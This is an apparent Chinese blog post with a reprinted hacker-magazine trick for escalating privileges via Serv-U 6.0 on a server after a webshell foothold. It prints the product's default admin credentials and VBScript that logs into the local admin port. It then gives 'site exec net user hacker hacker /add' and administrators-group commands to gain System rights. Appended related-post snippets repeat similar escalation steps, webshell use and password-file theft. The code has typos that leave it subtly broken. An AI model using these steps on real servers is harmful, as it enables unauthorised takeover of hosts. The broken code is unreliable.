Serv-u6.0提权新招

最新推荐文章于 2023-07-12 08:48:42 发布
最新推荐文章于 2023-07-12 08:48:42 发布 · 243 阅读 · 0
文章标签:

#.net

本文介绍了Serv-u6.0的提权新招,适用于服务器禁用FSO、关掉Wscript.shelll且无执行权限的环境。在未更改或已破解Serv-U管理员密码的情况下,利用MSWinsock.Winsock建立连接,以System权限添加超级用户,给出了相关代码及后续添加有执行权限用户的命令。

Serv-u6.0提权新招

来自:黑防4月份期刊

适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。

限制:没有更改管理员的密码,或者破解出了Serv-U的管理员的密码。Serv-U默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 下面用MSWinsock。Winsock建立一个连接,并且以System权限添加超级用户,代码如下:

Dim revdata

Dim sendata

Set sock=createobject(“MSWinsock.Winsock”)

Sock.protocol=0

Sock.connect “127.0.0.1”,43958

Sendata=”LocalAdministrator”& chr(10) &chr(13)

Sock.senddata snedata

Sendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13)

Sock.senddata.sendata

使用这个代码就可以连上FTP了,接下来用Sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用”site exec net user hacker hacker /add” “site exec net localgroup administrators hacker /add”

呵呵,就这样系统权限到手了,祝大家好运!

iteye_2449
关注
serv-u
Is0Man的博客
04-18 4085
主要方法: 一、serv-u ftp本地溢出升(使用6.0以及以前版本) 1、用Serv-U综合工具生成工具serv_u.exe 2、先上传 serv_u.exe 到一个盘符下 比如是d盘 3、执行命令 d:\serv_u.exe 4、d:\serv_u.exe “net user username password /add” (注意命令要有引号) 5、d:\se
Serv-U综合工具
04-24
Serv-U综合工具 开发环境:VC6.0sp6 + XPSP2 用ASProtect加壳 文件md5校验值:5377a1ae7994a100d8207a833cfa8542
第三方serv-u
aiquan9342的博客
01-05 406
文章比较简单,只是做一个科普。给一个好朋友的。 倘若口令更改了大家可以去serv-u的目录(默认路径:C:\Program Files\Serv-U\)找其配置文件(ServUDaemon.ini),在配置文件中有其密码。 webshell里默认的执行。如下操作: THE END 转载于:https://www.cnblogs.com/xi...
serv-u
qq_44881113的博客
07-17 205
1 查看系统进程 tasklist /svc 根据进程查看杀软 网址 https://www.ddosi.com/av/1.php 2 根据serv-u的pid值查看端口 netstat -ano | findstr 10720 #根据pid找到端口号 3 找到serv-u的版本号【低版本都有漏洞 】 根据版本查找漏洞 4 使用exp添加用户 查看用户 net user 添加成功 ...
Serv-u
weixin_44023460的博客
07-12 665
在asp.net的webshell中,单击“Cmdshell”,在CmdPath中将cmd.exe修改为net或者net.exe,然后在“Argument”中输入“net localgroup administrators”,最后单击“Submit”查看管理员用户组,如图1所示,一共有4个管理员用户。打开远程终端登录窗口,在连接地址中输入“xxx.xxx.xxx.xxx:53389”如图7所示,输入刚才添加的用户名和密码,成功登录远程终端,说明Serv-u成功。图7 Serv-U成功。
serv-u 6.0 简单 易用
最新发布
02-20
汉化新世纪.txt和汉化说明.txt文件表明,serv-u 6.0支持中文界面,文件中可能详细记录了如何进行汉化操作以及汉化后的界面如何使用,这对于希望使用中文界面的用户来说是一个非常友好的设置。 KK下载站.url文件可能...
SERV-U6.0破解
03-16
SERV-U6.0破解SERV-U6.0破解
SERV-U6.0带KEY免费FTP服务器工具
08-24
尽管旧版的SERV-U6.0可能缺少一些新版本的高级功能和安全更新,但作为基础的FTP服务,它仍能满足基本需求。然而,考虑到网络安全的重要性,建议定期更新软件,以获得最新的安全补丁和性能优化。 【总结】 SERV-U...
Serv-U_6.0
03-12
Serv-U_6.0
Serv-U6.0.0.2
03-22
Serv-U6.0.0.2:FTP服务器软件详解》 在信息技术高速发展的今天,文件传输成为日常工作的重要环节,而FTP(File Transfer Protocol)作为最古老的文件传输协议之一,依然在众多领域发挥着关键作用。Serv-U是一款...
第3课:serv-u服务器serv-u目录无修改限的情况)
06-24
第3课:serv-u服务器serv-u目录无修改限的情况)
serv-u6.0.4.6
07-18
serv-u 6.0.4.6汉化版 稳定、高效、易用!
serv-u原理探究与JSP版木马编写
热门推荐
lup7in的专栏
11-30 1万+
转载请注明出处:http://write.blog.csdn.net/postedit/7025588 今天在搞一个aspx的网站时,看到aspxspy这个木马中集成的serv-u功能,于是就有了研究一下serv-u原理的想法。先来看看aspxspy的相关代码是怎么写的: public void lDODR() { string JGGg=string.Empty; stri
Serv-U 6.X 脚本
weixin_30691871的博客
01-14 201
信息来源:http://www.cnsst.org/ Author:落叶纷飞 使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。 1<%@LANGUAGE=VBScript%> 2<% 3Dimuser,pass,po...
利用Serv-u的简单思路
weixin_45945976的博客
10-18 2368
利用Serv-u Serv-u分两种: 有修改限(可写限) 无限修改(不可写限) 安装目录找到serv u的ServUDaemon.ini这个文件(该文件时储存密码的),然后将密码丢到shell里面去,然后进行serv-u,一般管理员并不修改serv-u的密码 1.先判断服务器中是否安装了serv-u serv-u的默认端口是43958 可以用nmap 扫描确认 判断是否有写入限: 一般安装目录 c:\Program Files\Serv-u\SerUDaemon.ini 进入到
ASP攻击代码 Serv-U 通用代码 Serv-U Local Add User with ASP
weixin_34082789的博客
06-03 184
Serv-U 通用代码,支持最新版本的Serv-U。 .abu.点评: Serv-U 的是一个长久以来一直存在的却容易被忽视的问题,主要还是利用Serv-U默认的管理员密码来执行相关入侵指令。 Serv-U 系列版本中都存在一个默认的管理员LocalAdministrator,以及默认的密码#l@$ak#.lk;0@P,还有默认的监听端口43958。 要...
Serv-U 6.X 的脚本
cnbird's blog
02-01 1378
来自:77169.org使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP Dim user, pass, port, ftpport, cmd, loginuser, loginpass,
教你serv-u -间歇博客
weixin_34082854的博客
09-01 187
serv-u ftp本地溢出升(使用6.0以及以前版本) 0.Serv-U综合工具生成工具serv_u.exe1.先上传 serv_u.exe 到一个盘符下 比如是d盘2.执行命令 d:serv_u.exe3.d:serv_u.exe “net user username password /add” (注意命令要有引号)4.d:serv_u.exe“net localgrou...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值